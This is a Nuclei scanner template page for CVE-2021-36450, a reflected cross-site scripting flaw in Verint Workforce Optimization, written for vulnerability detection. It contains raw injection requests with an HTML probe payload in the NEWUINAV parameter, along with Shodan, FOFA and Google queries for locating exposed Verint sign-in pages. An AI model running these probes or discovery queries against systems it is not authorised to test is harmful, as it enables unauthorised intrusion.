Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting

ID: CVE-2021-36450

Severity: medium

Author: atomiczsec

Tags: cve2021,cve,xss,verint

Description

Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.

YAML Source

id: CVE-2021-36450

info:
  name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting
  author: atomiczsec
  severity: medium
  description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization.
  reference:
    - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
    - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
    - http://verint.com
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36450
    - https://medium.com/%401nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-36450
    cwe-id: CWE-79
    epss-score: 0.00229
    epss-percentile: 0.61052
    cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: verint
    product: workforce_optimization
    shodan-query:
      - title:"Verint Sign-in"
      - http.title:"verint sign-in"
    fofa-query: title="verint sign-in"
    google-query: intitle:"verint sign-in"
  tags: cve2021,cve,xss,verint

http:
  - raw:
      - |
        GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><h1>Test</h1>26" class="loginUserNameText'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrfp_login
        group: 1
        regex:
          - 'csrfp_login=([a-zA-Z0-9]+);'
        internal: true
        part: header
# digest: 4a0a00473045022034e410c5f02f30d9f80233dd532ed61dfa390505b699e126ef6e55facc2aa17f022100d9343e98b184e040c13ee78d2e7fff33db870e0f0de461cf3ec3ff9b79af3d03:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-36450.yaml"

View on Github